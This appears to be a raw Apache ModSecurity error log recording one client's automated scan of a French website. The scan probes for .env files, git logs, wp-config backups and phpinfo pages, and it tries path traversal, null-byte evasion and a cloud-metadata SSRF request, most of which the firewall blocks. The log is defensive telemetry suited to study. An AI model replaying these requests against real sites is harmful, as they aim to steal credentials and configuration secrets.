[Tue May 12 05:10:31.945516 2026] [security2:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/.env"] [unique_id "agKaJ9r1yOh9TvizeziYvwAAAEc"]
[Tue May 12 05:10:31.945514 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.ENV"] [unique_id "agKaJzue9Sp-pIv_Bb69HwAAAUc"]
[Tue May 12 05:10:31.945577 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKaJ3o6NvB9WXx5V-6nIgAAARM"]
[Tue May 12 05:10:31.945631 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.ENV"] [unique_id "agKaJzue9Sp-pIv_Bb69HwAAAUc"]
[Tue May 12 05:10:31.945729 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.bak"] [unique_id "agKaJ81tk6y7yBJLpJozKgAAAI4"]
[Tue May 12 05:10:31.945753 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/logs/HEAD"] [unique_id "agKaJ3o6NvB9WXx5V-6nIgAAARM"]
[Tue May 12 05:10:31.945815 2026] [security2:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.ENV"] [unique_id "agKaJzue9Sp-pIv_Bb69HwAAAUc"]
[Tue May 12 05:10:31.945838 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.bak"] [unique_id "agKaJ81tk6y7yBJLpJozKgAAAI4"]
[Tue May 12 05:10:31.946030 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php.bak"] [unique_id "agKaJ81tk6y7yBJLpJozKgAAAI4"]
[Tue May 12 05:10:31.957201 2026] [core:error] [pid 1730207:tid 1730210] [client 45.148.10.246:21460] AH10244: invalid URI path (/../.env)
[Tue May 12 05:10:31.957206 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php~"] [unique_id "agKaJwgpmE1yW0glLdgnkAAAANc"]
[Tue May 12 05:10:31.957321 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php~"] [unique_id "agKaJwgpmE1yW0glLdgnkAAAANc"]
[Tue May 12 05:10:31.957499 2026] [security2:error] [pid 1825287:tid 1825329] [client 45.148.10.246:21560] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php~"] [unique_id "agKaJwgpmE1yW0glLdgnkAAAANc"]
[Tue May 12 05:10:31.959102 2026] [:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] File does not exist: /home/ixinabou/public_html/phpinfo.php
[Tue May 12 05:10:31.959600 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozKwAAAIU"]
[Tue May 12 05:10:31.960192 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozKwAAAIU"]
[Tue May 12 05:10:31.960388 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_next/image"] [unique_id "agKaJ81tk6y7yBJLpJozKwAAAIU"]
[Tue May 12 05:10:31.961279 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJzue9Sp-pIv_Bb69IQAAAUk"]
[Tue May 12 05:10:31.961395 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJzue9Sp-pIv_Bb69IQAAAUk"]
[Tue May 12 05:10:31.961583 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaJzue9Sp-pIv_Bb69IQAAAUk"]
[Tue May 12 05:10:31.962907 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.962955 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.962981 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.963145 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.963190 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.963225 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.963531 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.963735 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnkgAAANg"]
[Tue May 12 05:10:31.964800 2026] [:error] [pid 1825179:tid 1825205] [client 45.148.10.246:21576] File does not exist: /home/ixinabou/public_html/configuration.php
[Tue May 12 05:10:31.964965 2026] [core:error] [pid 1820198:tid 1820214] [client 45.148.10.246:21506] AH10244: invalid URI path (/static../../../.env)
[Tue May 12 05:10:31.965107 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.development"] [unique_id "agKaJ3o6NvB9WXx5V-6nJgAAARM"]
[Tue May 12 05:10:31.965223 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.development"] [unique_id "agKaJ3o6NvB9WXx5V-6nJgAAARM"]
[Tue May 12 05:10:31.965449 2026] [security2:error] [pid 1730175:tid 1730196] [client 45.148.10.246:21522] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.development"] [unique_id "agKaJ3o6NvB9WXx5V-6nJgAAARM"]
[Tue May 12 05:10:31.965790 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.bak"] [unique_id "agKaJxfeipD4uoG21FoqHwAAABU"]
[Tue May 12 05:10:31.965934 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.bak"] [unique_id "agKaJxfeipD4uoG21FoqHwAAABU"]
[Tue May 12 05:10:31.966150 2026] [security2:error] [pid 1808852:tid 1808876] [client 45.148.10.246:21468] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.bak"] [unique_id "agKaJxfeipD4uoG21FoqHwAAABU"]
[Tue May 12 05:10:31.966223 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaJwgpmE1yW0glLdgnkwAAANI"]
[Tue May 12 05:10:31.966332 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaJwgpmE1yW0glLdgnkwAAANI"]
[Tue May 12 05:10:31.966512 2026] [security2:error] [pid 1825287:tid 1825323] [client 45.148.10.246:21532] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/storage/.env"] [unique_id "agKaJwgpmE1yW0glLdgnkwAAANI"]
[Tue May 12 05:10:31.980102 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJxfeipD4uoG21FoqIQAAABc"]
[Tue May 12 05:10:31.980225 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJxfeipD4uoG21FoqIQAAABc"]
[Tue May 12 05:10:31.980424 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaJxfeipD4uoG21FoqIQAAABc"]
[Tue May 12 05:10:31.980429 2026] [:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] File does not exist: /home/ixinabou/public_html/php_info.php
